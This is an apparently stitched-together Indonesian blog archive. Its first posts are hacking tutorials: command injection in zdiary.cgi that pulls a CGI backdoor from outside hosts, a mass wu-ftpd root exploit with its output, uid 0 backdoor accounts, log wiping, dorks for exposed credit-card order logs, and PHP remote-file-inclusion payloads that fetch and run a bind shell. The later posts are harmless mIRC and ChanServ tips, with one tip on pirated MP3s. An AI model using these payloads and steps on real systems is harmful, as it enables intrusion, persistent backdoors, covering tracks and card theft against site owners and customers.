Kita bisa memasukkan beberapa jenis backdoor seperti bindtty dll............
Kenapa saya memilih web backdoor..??? karena web backdoor ini merupakan
Backdoor yang sangat ampuh (menurut saya). Sulit di deteksi (apalagi kalo pake
penyamaran nama file yang bener2 ok)
Tidak terpengaruh oleh firewall dan admin web pada saat mengecek koneksi yang
terjadi pada web-nya, yang mereka tau adalah kita hanya seperti browsing biasa.
Karena kita melakukannya lewat port 80….!!!
Saya menggunakan backdoor dari "http://www.rohitab.com/cgiscripts/cgitelnet.txt"
Baik sekarang kita akan melakukan uploading backdoor tersebut ke web target.
Dalam mengupload backdoor, kita akan menggunakan command wget. Yakni
command di linux yang khusus untuk download ke web server.
Catatan :
Tidak semua server menginstall wget, dan jika itu terjadi, maka pilihan kita selanjutnya
Adalah menggunakan lwp-download, fasilitas download dari perl.

Contoh : http://www.mikazo.net/cgiscript/sample/zdiary/zdiary.cgi?action=diary_view&menutitle=%E5%A2%97%E6%AE%96%EF%BC%9F&file=./file0011.dat|wget http://www.rohitab.com/cgiscripts/cgitelnet.txt|&page=0
Kita mengambil cgitelnet.txt dari http://www.rohitab.com/cgiscripts/cgitelnet.txt,
Yang selanjutnya akan di save di http://www.mikazo.net/cgiscript/sample/zdiary/
Sekarang kita check apakah kita berhasil ato tidak.
http://www.mikazo.net/cgiscript/sample/zdiary/cgitelnet.txt

jika ada pesan error file not found, berarti kita gagal menggunakan wget, selanjutnya
kita coba alternatif kedua : http://www.mikazo.net/cgiscript/sample/zdiary/zdiary.cgi?action=diary_view&menutitle=%E5%A2%97%E6%AE%96%EF%BC%9F&file=./file0011.dat|lwp-download http://www.rohitab.com/cgiscripts/cgitelnet.txt|&page=0
sekarang kita chek lagi :
http://www.mikazo.net/cgiscript/sample/zdiary/cgitelnet.txt
Yupe sekarang ada tampilan source dari cgitelnet.txt.
Selamat berhasil….!!!! :P~
Baik sekarang apa selanjutnya..???
Selanjutnya adalah kita harus merubah nama cgitelnet.txt ke cgitelnet.cgi dan merubah
Chmod-nya ke 755 agar kita bisa mengexekusi-nya.
a. Merubah nama cgitelnet.txt ke cgitelnet.cgi
http://www.mikazo.net/cgiscript/sample/zdiary/zdiary.cgi?action=diary_view&menutitle=%E5%A2%97%E6%AE%96%EF%BC%9F&file=./file0011.dat|mv cgitelnet.txt cgitelnet.cgi|&page=0
b. Merubah chmod ke 755
http://www.mikazo.net/cgiscript/sample/zdiary/zdiary.cgi?action=diary_view&menutitle=%E5%A2%97%E6%AE%96%EF%BC%9F&file=./file0011.dat|chmod 755 cgitelnet.cgi|&page=0

TIGA :
Execkusi backdoor dan selancar di system target

Oke, sekarang kita telah berhasil memasukkan backdoor ke web target. Sekarang coba
kita exekusi:
http://www.mikazo.net/cgiscript/sample/zdiary/cgitelnet.cgi
tampilan yang muncul adalah :
login: admin
password: enter

baik sekarang kita masukkan password.
Password = changeme
daaaannn…. Hasilnya adalah :

[admin@www.mikazo.net /home/s20144-1/public_html/cgiscript/sample/zdiary]$

selesai….!!!!!

Oke, sekarang info:
Pada contoh di atas, saya menggunakan bug pada zdiary.cgi.
zdiary v1.51, v1.52 (all version) by mikazo
untuk mencari webserver yang menginstall zdiary, gunakan key word pada google
sebagai berikut :
allinurl: “zdiary.cgi”

posted by HAIDIR @ 7:33 AM 0 comments


Friday, August 19, 2005

Hacking Server dengan Shell

Hacking Server Dari shell

Berikut ini saya paparkan bagaimana cara menghack suatu server dari shell.
lets...Try For Hack...

Langkah pertama, kita masuk dulu ke shell kita, setelah kita berada di shell kita, kita download doloe exploits itu.www.utay-doyan.cc/ftp.tgz - www.utay-doyan.cc/xpost.tgz.
Jadi di shell kita tinggal ketik wget www.utay-doyan.cc/ftp.tgz .
Setelah file udah selesai di download ketik tar -zxvf ftp.tgz .
Begitu juga dengan exploits xpost.tgz, cara compile nya sama dengan compile ftp.tgz seperti di atas. perlu di ingat paling tidak kita membuka dua session telnet or ssh . satu untuk exploits ftp satu session untuk xpost.
Nahh, abis itu kita tinggal masuk ke directory ftp ketik cd ftp otomatis kita udah ada di directory ftp, and di session satunya buat xpost kita ketik cd xpost . Setelah kita udah berada di directory xpost contoh ketik ./scan 202.1 tekan enter. Maksud dari ./scan 202.1 adalah kita men scan ip 202.1 sampai selesai, abis kita enter tinggal tunggu aja nanti akan ada keterangan seperti ini :

[iwek@jarada xwurm]$ ./scan 211.240
Wait for Scanning 211.240 (3-5 minutes for class B)
Scan Result:
--------------------------------
211.240.28.66
211.240.38.1
211.240.48.62
211.240.48.190
211.240.56.62
211.240.56.254
211.240.56.126
211.240.61.30
211.240.61.62
211.240.61.126
211.240.61.158
211.240.61.238
--------------------------------
Results logged in wu-scan.log
[iwek@jarada xwurm]$



nahh itu hasil dari scan nyah tadi. tinggal kita ketik ./masswu wu-scan.log tunggu aja doloe, nttar kalo ada keterangan You Have Root In 211.240.56.254 berarti kemungkinan besar kita dapet jebol itu server.

Abis itu di session telnet yang satu nya, yang udah siap di directory ftp, kita ketik ./awu 211.240.56.254 apabila ada keterangan seperti di bawah ini :

[iwek@jarada ftp]$ ./awu 211.240.56.254
Checking 211.218.149.47 for vulnerable wu-ftpd 2.x <>
Compiled for MnM 01/12/2001..pr0t!

# trying to log into 211.240.56.254 with (ftp/mozilla@) ... connected.
# banner: 220 root.ivines.co.kr FTP server (Version wu-2.6.1-16) ready.
# successfully selected target from banner

### TARGET: RedHat 7.1 (Seawolf) [wu-ftpd-2.6.1-16.rpm]

# 1. filling memory gaps
# 2. sending bigbuf + fakechunk
building chunk: ([0x0807314c] = 0x08085f98) in 238 bytes
# 3. triggering free(globlist[1])
#
# exploitation succeeded. sending real shellcode
# sending setreuid/chroot/execve shellcode
# spawning shell
############################################################################
uid=0(root) gid=0(root) groups=50(ftp)
Linux root.ivines.co.kr 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknow


Yess.. Berarti kita udah masuk server itu. coba ketik whoami apabila keterangnnya di bawah root berarti kita udah dapet acces root.

Mo adduser ? nahh nttar ketik /usr/sbin/adduser ganjen -g wheel -s /bin/bash -d /home/ganjen tekan enter, abis itu buat password nyah ketik

passwd ganjen tekan enter , abis itu ketik kanjud tekan enter abis itu ketik lagi kanjud , nb: ketik kanjud dua kali itu kegunaan nya buat password kita

nahh apabila ada keterangan :

Changing password for user ganjen
passwd: all authentication tokens updated successfully


berarti kita udah dapet user di shell tersebut, jadi tinggal login aja, jangan lupa catet ip nyah..

kalo mau dapet acces root ketik :

/usr/sbin/useradd crit -u 0 -d /

abis itu ketik lagi

passwd -d crit

abis ketik itu kita otomatis udah dapet acces root

nahh semuanya udah selesai khan... jangan ampe lupa apus jejak supaya ga cepet matek shell nyahh... abis semuanya kelar kita udah add user udah dapet acces root nttar ketik :

cd /
rm -f /.bash_history /root/.bash_history /var/log/messages
ln -s /dev/null /root/.bash_history
touch /var/log/messages
chmod 600 /var/log/messages
rm -rf /var/log/lastlog
cat > /var/log/lastlog

udah di ketik semua ? udahh... tekan ctrl d . udah deh ... keluar khan... crottt... hiahaihaia mudah khan :) nice to try. Buat exploits lain kamu bisa cari di site-site laen...

posted by HAIDIR @ 5:55 AM 0 comments



Cari CC di *.Log

Beriku Adalah tutorial lama untuk Cari CC (BUkan Cawat Cewe) :P
Lets Begin

gini
buka google
keywordnya "cgi-bin/store/index.cgi?page="
salah satu alamat site nya yg ada di google : http://www.cashwells.com/cgi-bin/store/index.cgi?page=Repair_Manuals.htm
Repair_Manuals.htm <= ini dibuang trus trus masukin bug ini => http://fadliyanur.multiply.com/admin/files/order.log
trus
http://www.cashwells.com/cgi-bin/store/index.cgi?page=http://fadliyanur.multiply.com/admin/files/order.log
ok

Ok gimana...tuh drama singkat antara aku dengan Maling_duit...dan kayaknya si Maling_duit ituh yg lagi baca nih :)...emang enaaaaaaaaakkk.....Gua ngga Tanggung Jawab Kalo Trantib datang kerumah elo buat minta jatah hasil cardingan elo yaa...:P

Keep To Share.

posted by HAIDIR @ 5:38 AM 0 comments



Instal CGI Telnet

Install Cgi-telnet
1.buat url seperti ini :


" http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=wget http://nofry.port5.com/pees.pl -O /var/www/cgi-bin/test.pl "

url diatas untuk melakukan wget cgi-telnet test.pl ke server target dan hasil wget disimpan di folder /var/www/cgi-bin dg nama file test.pl. sesuaikan dengan letak folder cgi-bin didalam server tersebut untuk menyimpan hasil wget cgi-telnetnya.

2. buat cgi-telnet test.pl jadi file eksekusi :

" http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=chmod 755 /var/www/cgi-bin/test.pl "

3. akses cgitelnet kita dengan membuka url :
" http://www.target.com/cgi-bin/test.pl "

masukkan passwordnya "n0fr13"

posted by HAIDIR @ 4:38 AM 0 comments



PHP SUPER BUGS

Tittle : SUPER KIDDIES HACKING: "PHP SUPER BUGS"
Author : K-159
Greetz : Lieur-Euy, Red_Face, Itsme-, yudhax, pe_es, bithedz, KuNtuA, Baylaw, Minangcrew,
Chanel : #bandunghacker, #indohackinglink, #hackercrew, #batamhacker, #aikmel
Email : eufrato@linuxmail.org
Reference : security-corporations.com, security-focus.com, bugs-traq, google.com
------------------------------------------------------------------------------------
Prolog : i wrote this tutorial just for my dearest brother "Lieur-Euy" thx for all the best friendship, spirit, motivation, kindness, joke, and all the time that we spend together. just wait, till i finished my homework. 'n we will rock the world again :)

1. allinurl filename
bugs filename ini targetnya dapat kita cari dengan keyword "allinurl:*.php?filename=*".
keyword '*.php' bisa di ganti dengan apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah "allinurl:index.php?filename=*". Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:
" http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts "
kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.

2. allinurl content
bugs content ini targetnya dapat kita cari dengan keyword "allinurl:*.php?content=".
keyword '*.php' bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah "allinurl:index.php?content=". Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:
" http://www.target.com/target/index.php?content=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts "
kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.

3. allinurl page
bugs page ini targetnya dapat kita cari dengan keyword "allinurl:*.php?page=*".
'*.php' bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah "allinurl:index.php?page=". Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:
http://www.target.com/target/index.php?page=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts
kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.

4. allinurl link
bugs filename ini targetnya dapat kita cari dengan keyword "allinurl:*.php?link=*".
keyword '*.php' bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah "allinurl:index.php?link=*". Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:
http://www.target.com/target/index.php?link=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts
kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.

5.allinurl file
bugs file ini targetnya dapat kita cari dengan keyword "allinurl:*.php?file=*".
'*.php' bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah "allinurl:index.php?file=*". Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:
http://www.target.com/target/index.php?file=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts
kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.

Setelah mendapatkan target yang vulnerable ada beberapa hal yang bisa kita lakukan :
I. install bindtty telnet
1.buat url seperti ini:
" http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=wget http://nofry.port5.com/bind1 -O /tmp/httpd "
url diatas untuk melakukan wget bindtty telnet ke server target dan hasil wget nya di taruh di folder /tmp dg nama file httpd.
2.lalu ubah file httpd yg berada di folder /tmp tadi jadi file eksekusi:
" http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=chmod 755 /tmp/httpd "
3.eksekusi file httpd tadi :
" http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=/tmp/httpd "
4. buka telnet ke IP target sesuai dg port bindttynya



Sabtu, 04 Juli 2009

Tips dan Trik mIRC

Diposting oleh Ranieqyu di 23.11 0 komentar
- Mencari Sebuah Nick
Ketik aja /whois nick, kalo nggak ketemu ketik /whowas nick untuk mengetahui kapan dia join terakhir, atau kalo pengen tahu siapa aja yang ada di tempat itu, ketik /who ip-nya. Atau kamu pengen tahu dia quit pesenya apa, ketik aja /msg nickserv info nick (khusus nick yang set private off)

- Gimana yah caranya ketik /quit tanpa keluar dari chanel......
Wah.....gampang kok, tinggal tekan ctr+k kemudian ketik /quit kamu nggak bakalan dech qut dari IRC. gak percaya?? coba aja ....:P


- Kita di cuekin
Seringkali kita merasa tidak mendapat respon saat chatting, nah! pastikan apakah anda benar-benar dicuekin atau ngga direspon lewat perintah: /ctcp [nama nick] finger
contoh : /ctcp izzanabila finger
[05:03] -> [izzanabila] FINGER
[05:03] [Izzanabila FINGER reply]: izza (izzanabila@yahoo.com) Idle 6942 seconds

nah, dari hasil reply tsb, maka kita dapat memperoleh informasi bahwa nick tersebut sudah idle selama 6940 detik, idle ini maksudnya si izzanabila nggak ngetik keyboard, nggak tau tuh,mungkin lupa nutup mIRCnya.
tapi kalau reply fingernya diperolah informasi "idle 0 seconds", berarti kita benar-benar dicuekin, jadi lupakan saja deh ya! cari lagi yang lain..hehehe .
kita juga bisa mengetahui email-address seseorang lho, coba perhatiin deh reply fingernya..

- Download MP3 lewat mIRC bisa?? Bisa Donk
Mau download lagu MP3? biasanya lagu2 "bajakan" yang baru dirilis paling cepat dipublish lewat IRC, sebab prosedurnya mudah dan nggak bertele-tele. cukup taruh di harddisk pada folder tertentu, tinggal kirim deh.
nah! caranya: kita join ke channel2 MP3, rekomendasi saya: #indomp3, #indomp3z, #cablemp3, #mp3, #mp3z.
kemudian ketik perintah untuk mencari lagunya dengan :
perintah : @locator [judul lagu atau artis]
kita tinggal tunggu aja, bila ditemukan maka akan muncul private/query message ke kita,..nah! copy dan paste aja ke channel.
tunggu, dan nantikan DCC-Sessionnya,
nih lihat contohnya.

@locator sheila_dan
Matches for *SHEILA*DAN* Copy and paste in channel to request a file (Slot:3/10) (Que:0/15) in use
!tollesthi sheila on 7 - dan (acoustic).mp3 ::INFO:: 4.5MB
!tollesthi SheilaOn7 - Dan.mp3 ::INFO:: 5.0MB
..... Total files found 1

sekarang tinggal copy "!tollesthi sheila on 7 - dan (acoustic).mp3" dan paste di channel tsb.
tunggu saja prosesnya.
mudah bukan?

- Tulisan Warna Warni
Gimana sih bikin tulisannya bisa warna-warni, huruf tebal, underline? gampang kok! gini caranya..
Sebelum mengetik text, pencet kombinasi tombol Ctrl-K, setelah itu akan keluar "mIRC color index" dan pilih aja warnanya.
misalnya kita mau kasih warna biru ketik: Ctrl-K 12 halooooo
bisa juga dikasih background color,cukup dipisahkan dengan "koma", lalu pilih warnanya, enjoy it!

Ctrl B = Bold (huruf tebal)
Ctrl U = Underline (huruf dengan garis bawah)

- Menyimpan Percakapan
Saya ingin menyimpan hasil percakapan saya, caranya?
klik kanan pada channel/nick bar, pilih buffer, kemudian save-as
atau sebelumnya klik "LOGGING" dan biasanya disimpan di direktori mirc\log

- Berapa Detik pesan kita sampek
Untuk mengetahui seberapa cepat pesan kita sampai ke server/user, gunakan "/ctcp [nickname] ping"
contoh:
/ctcp izzanabila ping
[06:18] [Izzanabila PING]
[06:18] [Izzanabila PING reply]: 1sec

informasi tsb, artinya Izzanabila merespon setelah 1 detik setelah kita mengirimkan "ping" dan mengirimkan "pong" ya..ping-pong
gitu lah..

- Pindah Room Pake Keyboard
Manfaatkan kombinasi tombol ALT dan ANGKA untuk berpindah window di mIRC, ALT+1 untuk window1, ALT+2 untuk window2, demikian seterusnya, jadi kita nggak perlu repot2 ngeklik pakai mouse, rasakan saja bedanya.

- Close cepat Room
pengen close tapi gak klik tanda silang... gunakan combinasi Shitf+(klik kiri mouse pada room yang ingin di close)

Oke,selamat mencoba dan selalu belajar..
sampai jumpa pada artikel saya yang lain.


Penggunaan Perintah-perintah mIRC

Diposting oleh Ranieqyu di 23.04 0 komentar
Halo temen-temen wah udah bisa register kan nick name kesayanganya.. nah klo udah wjib ni harus di ketahui.....
perintah-perintah dalam mirc.... silakan di baca yaaa.. trus di praktekan,klo gak bisa sialakan tanya yaaa....

REGISTER
Penggunaan : /chanserv REGISTER #channel password description
Keterangan : Memerintahkan ChanServ untuk me-register suatu channel.
Catatan : Untuk meregister sebuah channel yang belum diregister kamu harus punya status @ (operator) di channel tersebut. Jangan memberitahukan password kepada orang lain, gunakan kombinasi abjad dan angka yang mudah kamu ingat tapi susah ditebak oleh orang lain.
Contoh : /chanserv REGISTER #sejati vrdalnet12345 sejati Reality
Memerintahkan ChanServ untuk me-register channel #sejatil dengan password “vrdalnet12345? dan deskripsi “Sejati Reality”.

DROP
Penggunaan : /chanserv DROP #channel [dropcode]
Keterangan : Perintah ini untuk men-drop (un-register) sebuah channel. Gunakan /chanserv DROP #channel tanpa dropcode, tunggu konfirmasi dropcode dari chanserv dan masukkan perintah /chanserv DROP #channel [dropcode].
Catatan : Untuk menggunakan perintah ini kamu harus punya akses founder dan identify ke ChanServ.
Contoh : /chanserv DROP #Sejati
Perintah untuk men-drop channel #Sejati, setelah memasukkan perintah di atas tunggu di status kamu muncul konfirmasi dropcode dari ChanServ yang bentuknya seperti ini :
-ChanServ- Dropping a channel is permanent and cannot be undone!
-ChanServ- To confirm, type: /chanserv DROP #Sejati 13151683216
Selanjutnya silahkan ketik /chanserv DROP #Sejati 13151683216 dan selamat, kamu telah kehilangan sebuah channel ;p.

IDENTIFY
Penggunaan : /chanserv IDENTIFY #channel password atau /IDENTIFY #channel password
Keterangan : Perintah ini untuk meng-identify diri kamu sebagai founder channel dan perintah ini memberikan kamu hak akses penuh untuk menggunakan perintah yang hanya dapat digunakan oleh founder.
Contoh : /chanserv IDENTIFY #sejati vrdalnet12345
Identify sebagai founder channel #sejati dengan password channel “vrdalnet12345?.

SENDPASS
Penggunaan : /chanserv SENDPASS #channel email
Keterangan : Perintah ini digunakan founder untuk mengirimkan password channel ke email. Perintah ini berguna apabila founder lupa/kehilangan password channel.
Catatan : Password hanya akan dikirimkan oleh service DALnet apabila email yang diberikan pada perintah SENDPASS sama dengan email pada database DALnet. Email channel sama dengan email nick founder. Perintah SENDPASS dapat di-disable dengan perintah MAILBLOCK.
Contoh : /chanserv SENDPASS #Sejati founder@sejati-dalnet.com
Meminta ChanServ untuk mengirimkan password channel #sejati ke email founder@sejati-dalnet.com.

SOP - ADD | DEL | LIST | WIPE
Penggunaan : /chanserv SOP #channel ADD|DEL|LIST|WIPE [nick|mask]
Keterangan : Perintah ini digunakan oleh founder untuk menambah SOP (SuperOperator) baru (ADD), menghapus SOP (DEL), menampilkan datfar SOP channel (LIST) dan menghapus seluruh SOP dari daftar (WIPE).
Catatan : Perintah ADD, DEL, WIPE hanya dapat digunakan oleh founder, perintah LIST dapat digunakan oleh level AOP ke atas. Daftar SOP dibatasi maksimum 100 entri.
Contoh : /chanserv SOP #Sejati ADD Mr_Peace
Menambahkan nick Clarie^_^ ke dalam daftar SOP channel #Virtual.

AOP - ADD | DEL | LIST | WIPE
Penggunaan : /chanserv AOP #channel ADD|DEL|LIST|WIPE [nick|mask]
Keterangan : Perintah ini digunakan oleh founder dan SOP untuk menambah AOP (AutoOperator) baru (ADD), menghapus AOP (DEL), menampilkan datfar AOP channel (LIST) dan menghapus seluruh AOP dari daftar (WIPE).
Catatan : Perintah ADD dan DEL dapat digunakan oleh founder dan SOP, perintah LIST dapat digunakan oleh level AOP ke atas, perintah WIPE hanya dapat digunakan oleh founder. Daftar AOP dibatasi maksimum 300 entri.
Contoh : /chanserv AOP #Sejati ADD Mr_Peace
Menambahkan nick Mr_Five ke dalam daftar AOP channel #Virtual.

AKICK - ADD | DEL | LIST | WIPE
Penggunaan : |DEL|LIST|WIPE [nick|mask|host]
Keterangan : Perintah ini digunakan oleh founder dan SOP untuk menambah AKICK (AutoKick) baru (ADD), menghapus AKICK (DEL), menampilkan datfar AKICK channel (LIST) dan menghapus seluruh AKICK dari daftar (WIPE).
Catatan : Perintah ADD dan DEL dapat digunakan oleh founder dan SOP, perintah LIST dapat digunakan oleh level AOP ke atas, perintah WIPE hanya dapat digunakan oleh founder. Daftar AKICK dibatasi maksimum 200 entri.
Contoh : /chanserv AKICK #Sejati DEL *!*@*.net.id
Menghapus host *!*@*.net.id dari daftar AKICK channel #Sejati.

OP | DEOP
Penggunaan : /chanserv OP|DEOP #channel nickname
Keterangan : Perintah ini digunakan untuk meminta ChanServ memberikan atau mengambil status Operator @ nickname seseorang di channel.
Catatan : Perintah ini hanya dapat digunakan apabila kamu mempunyai akses minimal AOP di channel yang bersangkutan. Kamu tidak dapat men-DEOP seseorang yang mempunyai akses level lebih tinggi dari kamu, seorang AOP tidak dapat men-DEOP SOP.
Contoh : /chanserv OP #Sejati AeroC|oud
Meminta ChanServ memberikan status Operator kepada nick AeroC|oud di channel #Sejati.

MKICK
Penggunaan : /chanserv MKICK #channel
Keterangan : Perintah MKICK (MassKick) ini hanya digunakan pada keadaan tertentu, misalnya pada keadaan disinkronisasi di channel (saat terjadi netsplit) atau keadaan lainnya. Untuk keterangan lebih lanjut tentang netsplit silahkan kunjungi DALnet Documentation Project Site http://docs.dal.net/docs/netsplits.html.
Catatan : Perintah ini tidak dapat kamu gunakan apabila di dalam channel terdapat seseorang yang mempunyai akses level lebih tinggi dari kamu, seorang SOP tidak dapat menggunakan perintah MKICK apabila founder berada di dalam channel. Perintah ini menurut pandangan pribadi saya mempunyai akibat yang fatal, jadi tolong jangan sembarangan digunakan.
Contoh : /chanserv MKICK #Sejati
Memerintahkan ChanServ MassKick di channel #Sejati.

MDEOP
Penggunaan : /chanserv MDEOP #channel
Keterangan : Perintah MDEOP (MassDe-OP) ini akan men-DEOP semua orang di dalam channel yang mempunyai akses level sama dengan dan lebih rendah dari kamu, seorang AOP hanya dapat men-DEOP semua AOP dan operator non-permanen.
Contoh : /chanserv MDEOP #Sejati
Memerintahkan ChanServ MassDe-OP di channel #Sejati.

SET - FOUNDER
Penggunaan : /chanserv SET #channel FOUNDER
Keterangan : Perintah ini digunakan untuk meminta ChanServ mengganti nickname founder menjadi nickname yang sedang kamu gunakan sekarang.
Catatan : Nickname yang ingin kamu set menjadi founder harus sudah teregistrasi penuh dan kamu sebelumnya sudah identify ke ChanServ menggunakan password channel.

SET - PASSWD
Penggunaan : /chanserv SET #channel PASSWD oldpassword newpassword
Keterangan : Perintah ini untuk mengganti password channel.
Catatan : Untuk alasan keamanan, sangat disarankan untuk mengganti password channel kamu secara periodik.
Contoh : /chanserv SET #Sejati PASSWD vrdalnet12345 vr678dalnet
Mengganti password channel #Sejati dari “vrdalnet12345? menjadi “vr678dalnet”.

SET - DESC
Penggunaan : /chanserv SET #channel DESC newdescription
Keterangan : Perintah ini untuk mengganti deskripsi channel.
Contoh : /chanserv SET #Sejati DESC Our’s Virtual Home on DALnet!
Mengganti deskripsi channel #Sejati menjadi “Our’s Virtual Home on DALnet!”.

SET - MLOCK
Penggunaan : /chanserv SET #channel MLOCK mode_lock_option
Keterangan : Perintah ini digunakan untuk men-set MLOCK (Mode Lock) channel. Perintah ini merupakan salah satu perintah penting dalam mengelola keamanan channel. Berikut di bawah ini adalah mode_lock_option yang bisa kamu gunakan beserta keterangannya :
R - Only Registered nicks allowed (hanya nick yang sudah teregistrasi yang diizinkan masuk ke dalam channel). Sangat berguna apabila kamu ingin menghentikan serangan clone, karena sebagian besar serangan clone menggunakan nick yang tidak teregistrasi. Disarankan untuk membiarkan opsi R dalam keadaan un-set dan hanya diaktifkan pada saat channel menghadapi serangan clone, dapat diaktifkan melalui perintah /mode #channel +R
+n - No external messages (tidak menerima message/pesan dari luar channel). Untuk mencegah orang yang tidak berada di dalam channel mengirimkan pesan ke channel. Disarankan men-set MLOCK +N.
+t - Only ops set topic (hanya yang mempunyai status operator (@) di channel yang dapat merubah topic channel). Untuk mencepat user biasa merubah topic channel.
+p - Channel is private (pribadi). Untuk membuat channel tidak terlihat di daftar channel pada saat user IRC menggunakan perintah /list untuk keterangan lebih lengkap silahkan ketik “/help /list” di jendela status Mirc.
+s - Channel is secret (rahasia). Mempunyai fungsi yang sama dengan +p plus dengan tambahan channel tidak terlihat di whois. Kedua opsi MLOCK ini berguna untuk mencegah user yang tidak diinginkan masuk ke dalam channel.
+i - Channel is invite-only. Opsi ini membuat channel tertutup bagi semua orang sampai ada operator channel yang mengundang (invite) mereka atau mereka yang mempunyai akses ke channel menggunakan perintah /chanserv INVITE #channel.
+k - Required secret key (membutuhkan kunci rahasia/password). Setiap user harus memasukkan password yang benar baru bisa masuk ke dalam channel. Disarankan untuk men-set MLOCK -k bagi channel yang terbuka untuk umum.
+l - Channel is limited to person. Untuk membatasi jumlah user yang dapat masuk ke channel pada angka tertentu. Biasanya hanya digunakan apabila channel memiliki bot/shell untuk mengantisipasi serangan clone.
+m - Channel is moderated. Untuk mencegah user channel yang tidak memiliki status voice dan operator (tanda + dan @ di depan nickname) berbicara/chat di dalam channel. Disarankan untuk membiarkan opsi m dalam keadaan un-set dan hanya diaktifkan pada saat channel diserang flooder (flooding-attack), dapat diaktifkan melalui perintah /mode #channel +m
+c - Disable control codes (color, bold, underline, reverse). Untuk mencegah user chat di dalam channel menggunakan control codes (warna, cetak tebal, garis bawah, text ber latar-belakang). Opsi ini juga berguna dalam menghadapi serangan clone. Untuk keterangan lebih lanjut silahkan ketik “/help control codes” di jendela status Mirc atau kunjungi DALnet Documentation Project Site http:/docs.dal.net/docs/modes.html.

Contoh : /chanserv SET #Sejati MLOCK +snt-kl
Men-set Mode Lock channel #Sejati ke mode +snt-kl (mengaktifkan opsi secret, no external message, only ops set topic dan menon-aktifkan opsi secret key, channel is limited).

SET - OPGUARD
Penggunaan : /chanserv SET #channel OPGUARD on|off
Keterangan : Apabila OPGUARD di-set ke posisi ON maka hanya AOP, SOP dan founder yang diizinkan ChanServ untuk memiliki status Operator (@) di dalam channel, operator lain tanpa akses minimal AOP akan diturunkan oleh ChanServ.
Catatan : Disarankan untuk men-set OPGUARD ke posisi ON untuk alasan keamanan channel dan mencegah user yang tidak diinginkan memiliki status operator di channel.

SET - KEEPTOPIC
Penggunaan : /chanserv SET #channel KEEPTOPIC on|off
Keterangan : Perintah ini apabila di-set ke posisi ON maka ChanServ akan menyimpan topic channel pada saat channel tidak ada user dan mengembalikan topic channel apabila ada user yang masuk.

SET - URL
Penggunaan : /chanserv SET #channel URL [www.domainname.com]
Keterangan : Perintah ini untuk men-set alamat URL (Uniform Resource Locator) channel kamu, dimana URL channel dapat dilihat dengan perintah /chanserv INFO #channel.
Catatan : Untuk menghapus URL channel kamu cukup ketikkan “/chanserv SET #channel URL” tanpa diikuti nama domain (URL).
Contoh : /chanserv SET #Sejati URL www.sejati-dalnet.com
Men-set URL channel #Sejati ke “www.sejati-dalnet.com”.

SET - IDENT
Penggunaan : /chanserv SET #channel IDENT on|off
Keterangan : Perintah ini apabila di-set ke posisi ON maka para operator harus terlebih dahulu identify sebelum mereka di-Op oleh ChanServ.

SET - RESTRICT
Penggunaan : /chanserv SET #channel RESTRICT on|off
Keterangan : Perintah ini apabila di-set ke posisi ON maka ChanServ tidak akan mengizinkan user yang tidak terdaftar di access list channel untuk masuk ke dalam channel. ChanServ akan segera meng-Kick & Ban mereka. Hanya user dengan akses minimal AOP channel yang diizinkan masuk.

SET - VERBOSE
Penggunaan : /chanserv SET #channel VERBOSE on|off
Keterangan : Perintah ini apabila di-set ke posisi ON maka ChanServ akan me-Notify (mengirimkan pesan) setiap operator di dalam channel apabila terjadi perubahan pada access list channel seperti penambahan/penghapusan AOP, SOP, AKICK.
Notify dari chanserv akan berbentuk seperti ini :
-ChanServ:@#Sejati- [VERBOSE] ‘L1QuId!Lonely@202.155.32.53 => sop #Sejati add shadowZ

SET - TOPICLOCK
Penggunaan : /chanserv SET #channel TOPICLOCK founder|sop|off
Keterangan : Perintah ini untuk menentukan siapa saja yang berhak merubah topic channel, Founder, SOP atau user biasa (off).
Catatan : Perintah ini berkaitan dengan perintah “/chanserv SET #channel MLOCK +t” silahkan lihat kembali bagian SET-MLOCK.
Contoh : /chanserv SET #Sejati TOPICLOCK sop
Perintah ini menentukan hanya operator channel #Sejati dengan akses minimal SOP yang dapat merubah topic channel.

SET - LEAVEOPS
Penggunaan : /chanserv SET #channel LEAVEOPS on|off
Keterangan : Perintah ini apabila di-set pada posisi ON maka ChanServ akan membiarkan user pertama yang masuk ke dalam channel memiliki status operator @ (channel dalam keadaan kosong). Pada keadaan default, LEAVEOPS di-set pada posisi OFF, ini artinya ChanServ akan men-DEOP siapapun yang tidak memiliki akses minimal AOP. Sangat direkomendasikan kepada kamu untuk membiarkan setting LEAVEOPS pada keadaan OFF dengan alasan keamanan.

SET - UNSECURE
